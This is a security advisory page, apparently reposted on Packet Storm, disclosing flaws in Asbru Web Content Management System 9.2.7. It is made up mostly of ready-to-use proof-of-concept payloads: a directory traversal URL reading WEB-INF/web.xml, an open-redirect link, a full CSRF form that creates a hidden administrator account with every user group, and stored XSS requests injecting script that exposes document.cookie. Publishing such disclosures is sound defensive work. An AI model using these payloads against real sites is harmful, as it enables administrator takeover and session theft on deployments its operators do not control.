exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal
Posted Apr 6, 2016
Authored by LiquidWorm | Site zeroscience.mk

Asbru Web Content Management System version 9.2.7 suffers from cross site request forgery, cross site scripting, open redirection, and directory traversal vulnerabilities.

tags | exploit, web, vulnerability, xss, csrf
SHA-256 | a855a651720da4d549f9b5abc9c5497e9eafb205df8154d2cb842c4fccaf3b25
Download | Favorite | View

Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

Change Mirror Download

Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities


Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.

Tested on : Apache Tomcat/5.5.23
            Apache/2.2.3 (CentOS)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php


09.03.2016

--


#1
Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml


#2
Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk


#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------

<html>
  <body>
    <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
      <input type="hidden" name="userinfo" value="
<TEST></TEST>
" />
      <input type="hidden" name="title" value="Mr" />
      <input type="hidden" name="name" value="Chekmidash" />
      <input type="hidden" name="organisation" value="ZSL" />
      <input type="hidden" name="email" value="test@testingus.io" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="birthdate" value="1984-01-01" />
      <input type="hidden" name="birthday" value="01" />
      <input type="hidden" name="birthmonth" value="01" />
      <input type="hidden" name="birthyear" value="1984" />
      <input type="hidden" name="notes" value="CSRFNote" />
      <input type="hidden" name="userinfo1" value="" />
      <input type="hidden" name="userinfoname" value="" />
      <input type="hidden" name="username" value="hackedusername" />
      <input type="hidden" name="password" value="password123" />
      <input type="hidden" name="userclass" value="administrator" />
      <input type="hidden" name="usergroup" value="" />
      <input type="hidden" name="usertype" value="" />
      <input type="hidden" name="usergroups" value="Account Managers" />
      <input type="hidden" name="usergroups" value="Company Bloggers" />
      <input type="hidden" name="usergroups" value="Customer" />
      <input type="hidden" name="usergroups" value="Event Managers" />
      <input type="hidden" name="usergroups" value="Financial Officers" />
      <input type="hidden" name="usergroups" value="Forum Moderator" />
      <input type="hidden" name="usergroups" value="Human Resources" />
      <input type="hidden" name="usergroups" value="Intranet Managers" />
      <input type="hidden" name="usergroups" value="Intranet Users" />
      <input type="hidden" name="usergroups" value="Newsletter" />
      <input type="hidden" name="usergroups" value="Press Officers" />
      <input type="hidden" name="usergroups" value="Product Managers" />
      <input type="hidden" name="usergroups" value="Registered Users" />
      <input type="hidden" name="usergroups" value="Shop Managers" />
      <input type="hidden" name="usergroups" value="Subscribers" />
      <input type="hidden" name="usergroups" value="Support Ticket Administrators" />
      <input type="hidden" name="usergroups" value="Support Ticket Users" />
      <input type="hidden" name="usergroups" value="User Managers" />
      <input type="hidden" name="usergroups" value="Website Administrators" />
      <input type="hidden" name="usergroups" value="Website Developers" />
      <input type="hidden" name="users_group" value="" />
      <input type="hidden" name="users_type" value="" />
      <input type="hidden" name="creators_group" value="" />
      <input type="hidden" name="creators_type" value="" />
      <input type="hidden" name="editors_group" value="" />
      <input type="hidden" name="editors_type" value="" />
      <input type="hidden" name="publishers_group" value="" />
      <input type="hidden" name="publishers_type" value="" />
      <input type="hidden" name="administrators_group" value="" />
      <input type="hidden" name="administrators_type" value="" />
      <input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
      <input type="hidden" name="scheduled_publish_email" value="" />
      <input type="hidden" name="scheduled_notify" value="" />
      <input type="hidden" name="scheduled_notify_email" value="" />
      <input type="hidden" name="scheduled_unpublish" value="" />
      <input type="hidden" name="scheduled_unpublish_email" value="" />
      <input type="hidden" name="invoice_name" value="Icebreaker" />
      <input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
      <input type="hidden" name="invoice_address" value="nu" />
      <input type="hidden" name="invoice_postalcode" value="1300" />
      <input type="hidden" name="invoice_city" value="Neverland" />
      <input type="hidden" name="invoice_state" value="ND" />
      <input type="hidden" name="invoice_country" value="ND" />
      <input type="hidden" name="invoice_phone" value="111-222-3333" />
      <input type="hidden" name="invoice_fax" value="" />
      <input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
      <input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
      <input type="hidden" name="delivery_name" value="" />
      <input type="hidden" name="delivery_organisation" value="" />
      <input type="hidden" name="delivery_address" value="" />
      <input type="hidden" name="delivery_postalcode" value="" />
      <input type="hidden" name="delivery_city" value="" />
      <input type="hidden" name="delivery_state" value="" />
      <input type="hidden" name="delivery_country" value="" />
      <input type="hidden" name="delivery_phone" value="" />
      <input type="hidden" name="delivery_fax" value="" />
      <input type="hidden" name="delivery_email" value="" />
      <input type="hidden" name="delivery_website" value="" />
      <input type="hidden" name="card_type" value="VISA" />
      <input type="hidden" name="card_number" value="4444333322221111" />
      <input type="hidden" name="card_issuedmonth" value="01" />
      <input type="hidden" name="card_issuedyear" value="2016" />
      <input type="hidden" name="card_expirymonth" value="01" />
      <input type="hidden" name="card_expiryyear" value="2100" />
      <input type="hidden" name="card_name" value="Hacker Hackerowsky" />
      <input type="hidden" name="card_cvc" value="133" />
      <input type="hidden" name="card_issue" value="" />
      <input type="hidden" name="card_postalcode" value="1300" />
      <input type="hidden" name="content_editor" value="" />
      <input type="hidden" name="hardcore_upload" value="" />
      <input type="hidden" name="hardcore_format" value="" />
      <input type="hidden" name="hardcore_width" value="" />
      <input type="hidden" name="hardcore_height" value="" />
      <input type="hidden" name="hardcore_onenter" value="" />
      <input type="hidden" name="hardcore_onctrlenter" value="" />
      <input type="hidden" name="hardcore_onshiftenter" value="" />
      <input type="hidden" name="hardcore_onaltenter" value="" />
      <input type="hidden" name="hardcore_toolbar1" value="" />
      <input type="hidden" name="hardcore_toolbar2" value="" />
      <input type="hidden" name="hardcore_toolbar3" value="" />
      <input type="hidden" name="hardcore_toolbar4" value="" />
      <input type="hidden" name="hardcore_toolbar5" value="" />
      <input type="hidden" name="hardcore_formatblock" value="" />
      <input type="hidden" name="hardcore_fontname" value="" />
      <input type="hidden" name="hardcore_fontsize" value="" />
      <input type="hidden" name="hardcore_customscript" value="" />
      <input type="hidden" name="startpage" value="" />
      <input type="hidden" name="workspace_sections" value="" />
      <input type="hidden" name="index_workspace" value="" />
      <input type="hidden" name="index_content" value="" />
      <input type="hidden" name="index_library" value="" />
      <input type="hidden" name="index_product" value="" />
      <input type="hidden" name="index_stock" value="" />
      <input type="hidden" name="index_order" value="" />
      <input type="hidden" name="index_segments" value="" />
      <input type="hidden" name="index_usertests" value="" />
      <input type="hidden" name="index_heatmaps" value="" />
      <input type="hidden" name="index_user" value="" />
      <input type="hidden" name="index_websites" value="" />
      <input type="hidden" name="menu_selection" value="" />
      <input type="hidden" name="statistics_reports" value="" />
      <input type="hidden" name="sales_reports" value="" />
      <input type="submit" value="Initiate" />
    </form>
  </body>
</html>


#4
Stored Cross-Site Scripting:
----------------------------

a)


POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"


------WebKitFormBoundarygqlN2AtccVFqx0YN--


b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension="><script>alert(document.cookie)</script>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close